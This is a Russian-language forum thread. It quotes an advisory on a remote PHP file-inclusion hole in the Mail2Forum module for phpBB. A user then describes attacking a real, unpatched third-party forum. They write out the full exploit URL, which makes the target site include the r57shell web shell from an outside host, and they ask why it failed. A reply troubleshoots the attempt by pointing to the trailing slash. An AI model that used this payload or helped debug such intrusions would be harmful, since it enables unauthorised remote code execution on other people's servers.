19 июля, 2006 Программа: Mail2Forum (модуль к phpBB) 1.2, возможно другие версии. Опасность: Высокая Наличие эксплоита: Да Описание: Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. http://www.securitylab.ru/vulnerability/270750.php #### Делать было нечего, дело было вечером, а именно, забрел на секлаб, прочитал про данную уязвимость и очень захотел проверить состоятельность админов многострадального phpBB! После получаса игры со строкой браузера и с поисковиком, отчаялся найти непропатченные форумы, как наткнулся на один сайт , попытался заинклудить шелл по описанию в секлабе, вроде фишка прошла, в строке браузера имею.. _http://site.eu/forum/m2f/m2f_phpbb204.php?m2f_root_path=http://rst.void.ru/download/r57shell.txt/ после ее ввода нажимаю Enter и лицезрею ГЛАВНУЮ СТРАНИЦУ САЙТА РСТ! я же вроде инклудил шелл а получил лишь главную страничку! Странно получается, вроде инклуд не локальный (include_path='.:')... Пробовал подключать залитый на народ.ру remview, или ничего... или ошибки помогите разобраться
Зачем слеш в конце "r57shell.txt/"? Сервер не находит файл с расширением .txt и вместо 404 ошибки перекидывает на главную.Вот и все,если проблема решена то отпишись я закрою тему...